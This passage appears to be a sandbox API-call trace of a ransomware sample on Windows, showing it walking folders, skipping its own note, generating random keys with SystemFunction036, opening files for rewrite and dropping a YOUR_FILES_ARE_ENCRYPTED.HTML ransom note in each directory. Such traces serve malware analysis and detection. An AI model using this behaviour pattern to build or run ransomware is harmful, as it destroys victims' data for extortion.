ftCreationTime.dwLowDateTime=0x771bf51a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771bf51a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2bf5e1, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.801] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.801] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\eventbeacons.dat") returned 169 [0118.801] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.801] lstrlenW (lpString=".dat") returned 4 [0118.801] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.801] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209562\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.802] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.802] CloseHandle (hObject=0x338) returned 1 [0118.802] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x771bf51a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771bf51a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2bbb41, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.802] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.802] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\imprbeacons.dat") returned 168 [0118.802] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.802] lstrlenW (lpString=".dat") returned 4 [0118.802] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.802] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209562\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.802] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.802] CloseHandle (hObject=0x338) returned 1 [0118.802] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x771bf51a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771bf51a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2bbb41, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.802] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.803] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.803] GetProcessHeap () returned 0x600000 [0118.803] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209562\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.803] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.804] CloseHandle (hObject=0x214) returned 1 [0118.804] GetProcessHeap () returned 0x600000 [0118.804] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.804] GetProcessHeap () returned 0x600000 [0118.804] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.804] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771e56f1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771e56f1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x771e56f1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="209776", cAlternateFileName="")) returned 1 [0118.804] StrStrIW (lpFirst="209776", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.804] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776") returned 152 [0118.804] GetProcessHeap () returned 0x600000 [0118.804] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.804] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776" [0118.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\*" [0118.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771e56f1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771e56f1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x771e56f1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.804] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771e56f1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771e56f1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x771e56f1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.805] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x771e56f1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771e56f1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2dde1c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.805] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.805] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\eventbeacons.dat") returned 169 [0118.805] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.805] lstrlenW (lpString=".dat") returned 4 [0118.805] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.805] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209776\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.805] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.805] CloseHandle (hObject=0x338) returned 1 [0118.805] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x771e56f1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771e56f1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2da399, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.805] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.805] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\imprbeacons.dat") returned 168 [0118.805] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.805] lstrlenW (lpString=".dat") returned 4 [0118.805] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.805] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209776\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.806] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.806] CloseHandle (hObject=0x338) returned 1 [0118.806] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x771e56f1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x771e56f1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2da399, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.806] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.806] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.806] GetProcessHeap () returned 0x600000 [0118.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209776\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209776\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.808] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.809] CloseHandle (hObject=0x214) returned 1 [0118.809] GetProcessHeap () returned 0x600000 [0118.809] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.809] GetProcessHeap () returned 0x600000 [0118.809] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.809] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x773af2d3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x26ee548f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x26ee548f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="209809", cAlternateFileName="")) returned 1 [0118.809] StrStrIW (lpFirst="209809", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.809] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809") returned 152 [0118.809] GetProcessHeap () returned 0x600000 [0118.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.809] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809" [0118.809] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\*" [0118.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x773af2d3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x26ee548f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x26ee548f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.809] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x773af2d3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x26ee548f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x26ee548f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.809] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2f0992, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x2d2f3223, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x2d3a6745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xcd8, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1613723298", cAlternateFileName="161372~1")) returned 1 [0118.809] StrStrIW (lpFirst="1613723298", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.809] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\1613723298") returned 163 [0118.809] PathFindExtensionW (pszPath="1613723298") returned="" [0118.809] lstrlenW (lpString="") returned 0 [0118.809] PathFindExtensionW (pszPath="1613723298") returned="" [0118.809] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259c058e, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x259c53d7, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x25ab20aa, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x22a2, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1614152782", cAlternateFileName="161415~1")) returned 1 [0118.809] StrStrIW (lpFirst="1614152782", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.809] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\1614152782") returned 163 [0118.810] PathFindExtensionW (pszPath="1614152782") returned="" [0118.810] lstrlenW (lpString="") returned 0 [0118.810] PathFindExtensionW (pszPath="1614152782") returned="" [0118.810] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773af2d3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x773af2d3, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e345a53, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.810] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.810] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\eventbeacons.dat") returned 169 [0118.810] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.810] lstrlenW (lpString=".dat") returned 4 [0118.810] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.810] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209809\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.810] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.810] CloseHandle (hObject=0x338) returned 1 [0118.810] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773af2d3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x24e76fac, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2e341fb2, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.810] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.810] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\imprbeacons.dat") returned 168 [0118.810] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.810] lstrlenW (lpString=".dat") returned 4 [0118.810] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.810] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209809\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\209809\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.811] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.811] CloseHandle (hObject=0x338) returned 1 [0118.811] 